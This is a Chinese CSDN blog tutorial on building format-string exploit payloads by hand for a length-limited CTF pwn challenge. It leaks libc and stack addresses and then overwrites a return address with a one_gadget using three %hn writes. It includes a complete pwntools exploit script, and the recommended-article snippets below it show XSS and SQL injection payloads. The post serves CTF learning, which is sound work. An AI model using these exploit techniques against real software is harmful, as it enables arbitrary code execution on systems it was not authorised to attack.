手动构造格式化字符串payload

最新推荐文章于 2024-04-02 14:57:37 发布
最新推荐文章于 2024-04-02 14:57:37 发布
阅读量957 收藏 27
点赞数 27
分类专栏: pwn知识总结 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66751120/article/details/136167826
版权
本文详细介绍了在遇到字节限制的格式化字符串漏洞题目时,如何手动构造payload以满足条件。通过例子展示了如何利用gdb调试找到函数地址、栈地址,以及如何通过三次%hn格式化字符巧妙地修改返回地址。
摘要由CSDN通过智能技术生成

一、手动构造前置知识

像上次总结的格式化字符串漏洞的题都是能够溢出大量字节,因此能够使用pwntools的工具来自动生成payload

https://blog.csdn.net/weixin_66751120/article/details/136025172?spm=1001.2014.3001.5502

但是如果题目给到了字节限制,使payload链所占字节非常有限,不足以装下自动生成的,那么就需要我们去手动构造payload,在正式了解手动构造之前可以通过上面链接回顾一下格式化字符串漏洞的知识,并且需要特别注意三个格式化字符。这是手动构造的关键。

%c - 字符 - 输出字符
%hhn - 写1字节
%hn - 写2字节

这里要注意一个h是以两个字节的方式写入,一般使用这个可以更省字节。

二、例题

接下来通过这道例题来开始学习如何手动构造及一些新知识。

一般在main函数中看到fmt就很有可能是存在格式化字符串漏洞的函数。

查保护

保护全开,程序主体是一个while的循环,当我们输入1就会来到可以利用的格式化字符串漏洞,同时这道题没有后门且存在地址随机化,可以通过接受libc地址,来使用one_gadget,只要输入一循环就一定存在,但是可以试一下使用fmtstr的工具

这里看到发送字节远远超出读入,同时留意一下右侧自动生成的格式化字符串,手动构造就是仿照它的。这里先把错误原因放出来,然后下面从头写。

测得偏移为8

由于是循环所以可以多次利用格式化字符串漏洞,第一部当然是通过gdb调试找到可以使用的libc函数地址以及一个栈地址,

这里通过泄露偏移为8处的信息来确定下面的libc_start_main和下面的栈地址,然后就可以接受并利用了。

接下来是找到一个one_gadget可以使用fmt或者main的返回地址来修改为one_gadget,但是不能用printf因为存在字节限制我们不能一次修改完全,所以每次循环时将会返回无效地址,所以要先找到三个返回地址,printf的si进入printf函数就可以找到,由于这里是fmt函数,这个栈也是fmt函数的,所以rbp下面紧跟着的就是fmt函数的返回地址,而libc_start_main就是main函数的返回地址,通过我们接受到的地址,与gdb中地址所固定的偏移就可以得到。

接下来就是重点,由于%hn只能以两字节读入所以我们需要三次,先看第一次

pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack2)

< %数字c%数字$hn >把第一个数字的字节以两个字节的形式读入在第二个数字处。第二个数字就是后面p64()中将被修改的地址的偏移。

那么第一个数字就是one_gadget的两个字节,因为只能一次改两个字节,所以这里用了&运算符。

效果如下:

然后补全为0x28字节是因为再加后面地址就是0x30方便计算

分别是printf前后fmt返回地址的变化,已经修改成功了,至于13怎么得到,可以看修改前返回地址距离偏移8的距离,或者计算8+(6-1)(补齐为了0x28,gdb中显示的一个栈地址是8位所以是5)然后是修改中间两位,这里普及一点>>运算符右移,效果如下:

右移16位也就是2字节

但是只是这样还不够,为了方便看,gdb中把8个地址省略为了1个,也就是说一个地址对应一个字节,而我们修改的是中间两个字节,所以要把所要修改的地址加2到中间两字节的位置。

pay=(b'%'+str(one_gadget>>16&0xffff).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack2+2)

所以第三次就是加4,三次之后就修改成了,之后要发送一个不是1的东西,跳出循环,使fmt函数返回。

完整exp如下:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./pwn1')
p = process("./pwn1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
	gdb.attach(p)
	pause() 

p.sendline(b'1')
p.recvuntil(b'lbs,lbs,lbs')
pay=b'%45$p%47$p'
p.send(pay)

p.recvuntil(b'0x')
libc_base=int(p.recv(12),16)-243-libc.sym['__libc_start_main']
print(hex(libc_base))
p.recvuntil(b'0x')
stack=int(p.recv(12),16)
print(hex(stack))

stack1=stack-560 #printf
stack2=stack-256 #fmt
stack3=stack2+0x10#main

one_gadget=0xe3b01+libc_base
print(hex(one_gadget))
print(hex(one_gadget&0xffff))
print(hex(one_gadget>>16&0xffff))
print(hex(one_gadget>>32&0xffff))

p.sendline(b'1')
p.recvuntil(b'lbs,lbs,lbs')
pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack2)
#bug()
p.send(pay)

p.sendline(b'1')
p.recvuntil(b'lbs,lbs,lbs')
pay=(b'%'+str(one_gadget>>16&0xffff).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack2+2)
#pause()
p.send(pay)

p.sendline(b'1')
p.recvuntil(b'lbs,lbs,lbs')
pay=(b'%'+str(one_gadget>>32).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack2+4)
#pause()
p.send(pay)

#pause()
p.sendline(b'6')
p.interactive()

使用main返回地址时将其中的stack2改为3即可,效果相同,可以使用gdb调试验证。

江屿..
关注
专栏目录
SOME/IP协议详解「2.1.2·Payload数据类型序列化」
雪云飞星的博客
01-23 4034
SOME/IP协议详解「2.1.2·Payload数据类型序列化」 点击返回雪云飞星的SOME/IP协议详解「总目录」 SOME/IP协议详解「2.1.2·Payload数据类型序列化」1 大小端问题2 数据对齐填充问题3 都有哪些数据类型 之前简单的概括了一下序列化/反序列化,就是降维打击,从这一章开始到2.1所有章节结束,都在讲解这个降维打击的详细规则与原理 1 大小端问题 首先什么是大小端: 大端:高字节存放到内存的低地址 小端:高字节存放到内存的高地址 假如有一个数据是0x12345678
生成 Payload 的过程(Python)
JieLun_C的博客
09-08 1335
网络安全领域中,Payload 是指在利用漏洞或攻击目标时所使用的特定数据或代码块。生成 Payload 的过程通常涉及构造恶意代码、利用漏洞或设计特定的数据结构。本文将介绍使用 Python 生成 Payload 的一般步骤,并提供相应的源代码示例。生成 Payload 是一个复杂且技术密集的过程,需要深入了解相关的漏洞和攻击技术。然后,我们使用 UTF-8 编码将 Payload 转换为字节流,并打印生成的 Payload。根据 Payload 的目标和用途,需要构造特定的数据结构来实现所需的功能。
生成payload
分享学习网络的点点滴滴
12-30 645
【代码】生成payload
xss payload构造方法
weixin_48734687的博客
10-01 2488
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
sql盲注----构造payload 让信息通过错误提示回显出来
weixin_42350229的博客
01-15 959
基于报错的sql盲注----构造payload 让信息通过错误提示回显出来 select 1, count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a,floot(rand(0)*2))a jfrom information_schema.columns group by a; //explain:此处有三个点,一是需要 concat 计数,二是...
SSTI的payload构造思路
shawdow_bug的博客
04-24 2168
内置的方法和属性 有些对象类型内置了一些可读属性,它们不会被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
攻下windows7第三天——构造payload
ploto_cs的博客
10-03 2766
一.实验背景 随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的! 二.实验环境 攻击机kali :192.168.126.129 靶机 win7:192.168.126.134 三.操作步骤 1.使用.exe作为web shell(关闭防火墙) (1)生成一个payload
【XSS】payload 常用构造和变形方法
吉吉的博客
03-06 3576
XSS 相关 payload 构造和变形的常用方法。
CTF pwn题之格式化字符串漏洞详解
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
【逆向学习记录】格式化字符串漏洞原理及其利用
卦星的专栏
02-12 1260
1.概述 前面学习完成栈溢出的漏洞利用,接下来最长用到的就是格式化字符串了,由于懒散,春节之前耽误的很多时间,这里统一整理一下 学习的过程中,主要参考文章: 格式化字符串利用小结 CTF WIKI 格式化字符串漏洞利用 2.关键知识点 引用参考文件的内容 %c:输出字符,配上%n可用于向指定地址写数据。 %d:输出十进制整数,配上%n可用于向指定地址写数据。 %x:输出16进制数据,如%i$x表示...
格式化字符串漏洞:任意写
深度技术安全
02-05 439
linux pwn: 格式化字符串漏洞任意写
字符串拼接实现pwn
12-03
假设有一个程序存在格式化字符串漏洞,我们需要构造一个payload来执行system("/bin/sh")。首先,我们需要获取system函数的地址,可以使用pwntools中的DynELF模块来实现: ```python from pwn import * p = process...
栈溢出利用之return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2111
return to dl-resolve payload构造原理
手搓payload+非栈上格式化字符串
2301_79880074的博客
02-22 1313
格式化字符串漏洞类型题中我们可以利用payload = fmtstr_payload(offset,{printf_got:system_plt})这个工具去修改地址,但是这个工具产生的字节数是很大的,有时候我们是无法去正常利用的,我们需要去自己构造payload修改地址。
强大的XSS Payload
Killua
03-23 8976
1.构造post方式的html表单背景:某博客存在存储型xss漏洞操作:通过使用js脚本构造一个XSS Payload自动创建文章。实验的价值在于,只要成功了意味着可以模拟GET POST请求操作用户的浏览器。这在cookie劫持失败以后比较有用,如当受害者点击了恶意链接后,自己加载黑客的脚本,脚本模拟GET或者POST操作,这样就可以查看受害者的邮箱等待。实际上是模拟浏览器发送一个post给服务...
20212422 2023-2024-2 《网络与系统攻防技术》实验一实验报告
最新发布
weixin_62978988的博客
04-02 1087
shellcode就是一段机器指令(code)通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。我进行到最后一步一直提示管道破裂,并且segmentation fault。最初我以为是文件被修改的问题,
Payload笔记
菜浪马废的博客
09-13 2373
一.payload生成 msf: –p (- -payload-options) 添加载荷payload。 –l 查看所有payload encoder nops。 –f (- -help-formats) 输出文件格式。 –e 编码免杀。 –a (- -platform – -help-platforms) 选择架构平台 x86 | x64 | x86_64 –o 文件输出。 –s 生成payload的最大长度,就是文件大小。 –b 避免使用的字符 例如:不使用 ‘\0f’。 –i 编码次数。 –c 添
1.1 Metasploit 工具简介
热门推荐
CSDN
06-30 1万+
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
格式化字符串漏洞怎么测试偏移量
05-11
格式化字符串漏洞的测试过程中,需要先通过输入特定的格式字符串来泄露栈上的数据,然后再计算偏移量。以下是一个示例: 假设有以下代码: ```c #include <stdio.h> int main(int argc, char **argv) { char buf[100]; sprintf(buf, argv[1]); printf(buf); return 0; } ``` 如果我们输入 "%x",它会输出栈上的一些十六进制数值,这些数值表示函数调用时的参数、返回地址等信息。我们可以通过这些数值来计算偏移量。 例如,如果我们发现输出中包含一个类似于 "0xffffd5d4" 的地址,我们可以将其与我们想要覆盖的变量的地址进行比较,从而计算出偏移量。例如,如果我们想要覆盖一个在栈上的变量,它的地址为 0xffffd5e8,那么我们可以通过计算两个地址之间的差来确定偏移量: ``` 偏移量 = (0xffffd5e8 - 0xffffd5d4) / 4 = 3 ``` 然后我们就可以构造一个格式化字符串,将我们的 payload 写入到目标变量的内存地址中: ``` payload = "%3$nAAAA" + p32(0xffffd5e8) ``` 其中 "%3$n" 将会把前面的 AAAA 写入到第三个参数指向的内存地址中,也就是我们想要覆盖的变量的地址。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

江屿..

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值